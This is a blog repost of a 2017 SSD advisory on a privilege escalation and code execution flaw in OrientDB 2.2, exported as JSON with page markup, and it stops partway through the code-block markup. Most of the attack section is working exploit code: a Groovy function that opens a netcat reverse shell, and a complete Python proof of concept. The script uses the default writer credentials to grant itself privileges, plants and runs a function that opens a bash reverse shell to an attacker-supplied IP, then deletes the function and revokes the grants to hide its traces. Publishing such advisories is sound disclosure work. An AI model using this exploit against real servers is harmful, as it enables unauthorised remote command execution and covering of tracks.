{"id":8338,"date":"2017-07-13T14:19:49","date_gmt":"2017-07-13T22:19:49","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/07\/13\/news-2112\/"},"modified":"2017-07-13T14:19:49","modified_gmt":"2017-07-13T22:19:49","slug":"news-2112","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/07\/13\/news-2112\/","title":{"rendered":"SSD Advisory \u2013 OrientDB Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 13 Jul 2017 06:49:26 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3318\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3318');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory reports a vulnerability in OrientDB which allows users of the product to cause it to execute code.<\/p>\n<p>OrientDB is a Distributed Graph Database engine with the flexibility of a Document Database all in one product. The first and best scalable, high-performance, operational NoSQL database.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Francis Alexander, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerability.<br \/> For more information: <a href=\"https:\/\/github.com\/orientechnologies\/orientdb\/wiki\/OrientDB-2.2-Release-Notes#security\" target=\"_blank\">https:\/\/github.com\/orientechnologies\/orientdb\/wiki\/OrientDB-2.2-Release-Notes#security<\/a>.<\/p>\n<p><span id=\"more-3318\"><\/span><\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> OrientDB uses RBAC model for authentication schemes. By default an OrientDB has 3 roles &#8211; <em>admin<\/em>, <em>writer<\/em> and <em>reader<\/em>. These have their usernames same as the role. For each database created on the server, it assigns by default these 3 users.<\/p>\n<p>The privileges of the users are:<\/p>\n<ul>\n<li><u>admin<\/u> &#8211; access to all functions on the database without any limitation<\/li>\n<li><u>reader<\/u> &#8211; read-only user. The reader can query any records in the database, but can&#8217;t modify or delete them. It has no access to internal information, such as the users and roles themselves<\/li>\n<li><u>writer<\/u> &#8211; same as the &#8216;reader&#8217;, but it can also create, update and delete records<\/li>\n<\/ul>\n<p><em>ORole<\/em>\u200b structure handles users and their roles and is only accessible by the <em>admin<\/em> user. OrientDB requires <em>oRole<\/em> read permissions to allow the user to display the permissions of users and make other queries associated with <em>oRole<\/em> permissions. <\/p>\n<p>From version 2.2.x and above whenever the <em>oRole<\/em> is queried with a <em>where<\/em>, <em>fetchplan<\/em> and <em>order by<\/em> statements\u200b, this permission requirement is not required and information is returned to unprivileged users.<\/p>\n<p>Example:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5967f204b10ca277479442\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> select * from &lt;em&gt;oRole&lt;\/em&gt; order by name;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>The user <em>writer<\/em> which is created with every database you create. Thus even if the db admin changes the admin user password, an attacker would still be able to get Code Execution with the <em>writer<\/em> user.<\/p>\n<p>Since we enable the functions <em>where<\/em>, <em>fetchplan<\/em> and <em>order by<\/em>, and OrientDB has a function where you could execute groovy functions and this groovy wrapper doesn\u2019t have a sandbox and exposes system functionalities, we can run any command we want.<\/p>\n<p><u>Sample Groovy function:<\/u><br \/> <u>Command.md<\/u><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5967f204b10d5272783411\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> def command = &#8216;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081  &gt;\/tmp\/f&#8217;   File file = new File(&#8220;hello.sh&#8221;)   file.delete()   file &lt;&lt; (&#8220;#!\/bin\/bashn&#8221;)   file &lt;&lt; (command)   def proc = &#8220;bash hello.sh&#8221;.execute()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10d5272783411-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10d5272783411-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10d5272783411-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10d5272783411-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10d5272783411-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10d5272783411-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10d5272783411-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5967f204b10d5272783411-1\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10d5272783411-2\"><span class=\"crayon-s\">&gt;\/tmp\/f&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10d5272783411-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">File <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">File<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;hello.sh&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10d5272783411-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">delete<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10d5272783411-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#!\/bin\/bashn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5967f204b10d5272783411-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5967f204b10d5272783411-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-v\">proc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;bash hello.sh&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">execute<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Run Netcat at port 8081<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5967f204b10d8370802562\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> nc -lv 8081<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10d8370802562-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5967f204b10d8370802562-1\"><span class=\"crayon-v\">nc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">lv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8081<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>Run the following:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5967f204b10da574582436\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> python PoC.py ip [port] \/\/ By default uses 2480<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10da574582436-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5967f204b10da574582436-1\"><span class=\"crayon-e\">python <\/span><span class=\"crayon-v\">PoC<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py <\/span><span class=\"crayon-i\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ By default uses 2480<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p><u>PoC.py<\/u><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5967f204b10dc863783322\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import requests  import json  import string  import random    target = sys.argv[1]    try:      port = sys.argv[2] if sys.argv[2] else 2480  except:      port = 2480    url = &#8220;http:\/\/%s:%s\/command\/GratefulDeadConcerts\/sql\/-\/20?format=rid,type,version,class,graph&#8221;%(target,port)      def random_function_name(size=5, chars=string.ascii_lowercase + string.digits):      return &#8221;.join(random.choice(chars) for _ in range(size))    def enum_databases(target,port=&#8221;2480&#8243;):        base_url = &#8220;http:\/\/%s:%s\/listDatabases&#8221;%(target,port)      req = requests.get(base_url)        if req.status_code == 200:          #print &#8220;[+] Database Enumeration successful&#8221;          database = req.json()[&#8216;databases&#8217;]            return database        return False    def check_version(target,port=&#8221;2480&#8243;):      base_url = &#8220;http:\/\/%s:%s\/listDatabases&#8221;%(target,port)      req = requests.get(base_url)        if req.status_code == 200:            headers = req.headers[&#8216;server&#8217;]          #print headers          if &#8220;2.2&#8221; in headers or &#8220;3.&#8221; in headers:              return True        return False    def run_queries(permission,db,content=&#8221;&#8221;):        databases = enum_databases(target)        url = &#8220;http:\/\/%s:%s\/command\/%s\/sql\/-\/20?format=rid,type,version,class,graph&#8221;%(target,port,databases[0])        priv_enable = [&#8220;create&#8221;,&#8221;read&#8221;,&#8221;update&#8221;,&#8221;execute&#8221;,&#8221;delete&#8221;]      #query = &#8220;GRANT create ON database.class.ouser TO writer&#8221;        for priv in priv_enable:            if permission == &#8220;GRANT&#8221;:              query = &#8220;GRANT %s ON %s TO writer&#8221;%(priv,db)          else:              query = &#8220;REVOKE %s ON %s FROM writer&#8221;%(priv,db)          req = requests.post(url,data=query,auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))          if req.status_code == 200:              pass          else:              if priv == &#8220;execute&#8221;:                  return True              return False        print &#8220;[+] %s&#8221;%(content)      return True    def priv_escalation(target,port=&#8221;2480&#8221;):        print &#8220;[+] Checking OrientDB Database version is greater than 2.2&#8221;        if check_version(target,port):            priv1 = run_queries(&#8220;GRANT&#8221;,&#8221;database.class.ouser&#8221;,&#8221;Privilege Escalation done checking enabling operations on database.function&#8221;)          priv2 = run_queries(&#8220;GRANT&#8221;,&#8221;database.function&#8221;,&#8221;Enabled functional operations on database.function&#8221;)          priv3 = run_queries(&#8220;GRANT&#8221;,&#8221;database.systemclusters&#8221;,&#8221;Enabling access to system clusters&#8221;)            if priv1 and priv2 and priv3:              return True        return False    def exploit(target,port=&#8221;2480&#8243;):        #query = &#8216;&#8221;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;most&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8242;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:null&#8217;        #query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;ost&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;whoami&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute(); &#8220;,&#8221;parameters&#8221;:None}        func_name = random_function_name()        print func_name        databases = enum_databases(target)        reverse_ip = raw_input(&#8216;Enter the ip to connect back: &#8216;)        query = &#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;+func_name+'&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/&#8217;+reverse_ip+&#8217;\/8081 0&gt;&amp;1&#8242;;File file = new File(\\&#8221;hello.sh\\&#8221;);file.delete();file &lt;&lt; (\\&#8221;#!\/bin\/bash\\\\n\\&#8221;);file &lt;&lt; (command);def proc = \\&#8221;bash hello.sh\\&#8221;.execute();&#8221;,&#8221;parameters&#8221;:null}&#8217;      #query = &#8216;{&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:null,&#8221;name&#8221;:&#8221;&#8216;+func_name+'&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 0.0.0.0 8081 &gt;\/tmp\/f&#8217; u000a File file = new File(&#8220;hello.sh&#8221;)u000a     file.delete()       u000a     file &lt;&lt; (&#8220;#!\/bin\/bash&#8221;)u000a     file &lt;&lt; (command)n    def proc = &#8220;bash hello.sh&#8221;.execute() &#8220;,&#8221;parameters&#8221;:null}&#8217;      #query = {&#8220;@class&#8221;:&#8221;ofunction&#8221;,&#8221;@version&#8221;:0,&#8221;@rid&#8221;:&#8221;#-1:-1&#8243;,&#8221;idempotent&#8221;:None,&#8221;name&#8221;:&#8221;lllasd&#8221;,&#8221;language&#8221;:&#8221;groovy&#8221;,&#8221;code&#8221;:&#8221;def command = &#8216;bash -i &gt;&amp; \/dev\/tcp\/0.0.0.0\/8081 0&gt;&amp;1&#8217;;File file = new File(&#8220;hello.sh&#8221;);file.delete();file &lt;&lt; (&#8220;#!\/bin\/bash\\n&#8221;);file &lt;&lt; (command);def proc = &#8220;bash hello.sh&#8221;.execute();&#8221;,&#8221;parameters&#8221;:None}      req = requests.post(&#8220;http:\/\/%s:%s\/document\/%s\/-1:-1&#8243;%(target,port,databases[0]),data=query,auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))        if req.status_code == 201:            #print req.status_code          #print req.json()            func_id = req.json()[&#8216;@rid&#8217;].strip(&#8220;#&#8221;)          #print func_id            print &#8220;[+] Exploitation successful, get ready for your shell.Executing %s&#8221;%(func_name)            req = requests.post(&#8220;http:\/\/%s:%s\/function\/%s\/%s&#8221;%(target,port,databases[0],func_name),auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))          #print req.status_code          #print req.text            if req.status_code == 200:              print &#8220;[+] Open netcat at port 8081..&#8221;          else:              print &#8220;[+] Exploitation failed at last step, try running the script again.&#8221;              print req.status_code              print req.text            #print &#8220;[+] Deleting traces..&#8221;            req = requests.delete(&#8220;http:\/\/%s:%s\/document\/%s\/%s&#8221;%(target,port,databases[0],func_id),auth=(&#8216;writer&#8217;,&#8217;writer&#8217;))          priv1 = run_queries(&#8220;REVOKE&#8221;,&#8221;database.class.ouser&#8221;,&#8221;Cleaning Up..database.class.ouser&#8221;)          priv2 = run_queries(&#8220;REVOKE&#8221;,&#8221;database.function&#8221;,&#8221;Cleaning Up..database.function&#8221;)          priv3 = run_queries(&#8220;REVOKE&#8221;,&#8221;database.systemclusters&#8221;,&#8221;Cleaning Up..database.systemclusters&#8221;)            #print req.status_code          #print req.text    def main():        target = sys.argv[1]      #port = sys.argv[1] if sys.argv[1] else 2480      try:          port = sys.argv[2] if sys.argv[2] else 2480          #print port      except:          port = 2480      if priv_escalation(target,port):          exploit(target,port)      else:          print &#8220;[+] Target not vulnerable&#8221;    main()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5967f204b10dc863783322-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5967f204b10dc863783322-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" 